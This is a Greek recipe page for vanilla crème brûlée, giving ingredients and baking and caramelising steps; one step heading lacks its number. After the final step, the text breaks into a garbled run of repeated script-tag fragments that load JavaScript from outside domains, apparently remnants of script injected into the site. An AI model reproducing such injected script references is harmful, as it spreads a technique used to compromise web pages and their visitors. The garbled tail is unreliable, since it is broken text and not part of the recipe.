Κρεμ μπρουλέ βανίλια με βελούδινη υφή και τραγανή καραμέλα!

Διαχρονική αξία η πασίγνωστη κρέμα που μας έρχεται από τη Γαλλία.

Υλικά

250ml κρέμα γάλακτος 35%
250ml γάλα πλήρες
60γρ. ζάχαρη, κρυσταλλική
5 κρόκοι αβγών
1 λοβό βανίλιας
ζάχαρη για το καραμέλωμα
Διαδικασία

Βήμα 1

Κόβετε το λοβό της βανίλιας στη μέση και μετά κατά μήκος. “Ξύνετε” με ένα μυτερό μαχαιράκι τα σποράκια που βρίσκονται στο εσωτερικό του και τα ρίχνετε σε μια κατσαρόλα μαζί με το λοβό, το γάλα, την κρέμα γάλακτος και τη ζάχαρη. Βάζετε το κατσαρολάκι στη φωτιά να πάρει βράση το μίγμα.

Βήμα 2

Κατεβάζετε το μίγμα από τη φωτιά, αφαιρείτε το λοβό της βανίλιας και το ρίχνετε στα κροκάδια. Ανακατεύετε με ένα σύρμα μέχρι τα υλικά να ομογενοποιηθούν χωρίς όμως να δημιουργήσετε αφρό.

Βήμα 3

Προθερμαίνετε το φούρνο στους 180ºC. Μοιράζετε το μίγμα σε πυρίμαχα μπολάκια (ραμκέν) να φτάσει σε ύψος 3εκ., τα βάζετε σε ένα βαθύ ταψί και προσθέτετε βραστό νερό, περίπου 2 δάχτυλα, στον πάτο του ταψιού.

Βήμα

Τα βάζετε στο φούρνο και τα ψήνετε για 45-60 λεπτά περίπου (ανάλογα τον φούρνο) μέχρι η κρέμα να πήξει.

Βήμα 5

Αφού βγουν από το φούρνο και κρυώσουν, τα αφήνετε στο ψυγείο. Όταν θέλετε να σερβίρετε τα πασπαλίζετε ομοιόμορφα με ζάχαρη και δημιουργείτε ένα λεπτό στρώμα από πάνω. Με το φλόγιστρο καίτε τη ζάχαρη ώσπου να γίνει καραμέλα. Περιμένετε 2-3 λεπτά να στερεοποιηθεί η τραγανή καραμέλα και σερβίρετε. Αν θέλετε συνοδεύετε με φρέσκα φρούτα της επιλογής σας.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’> challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >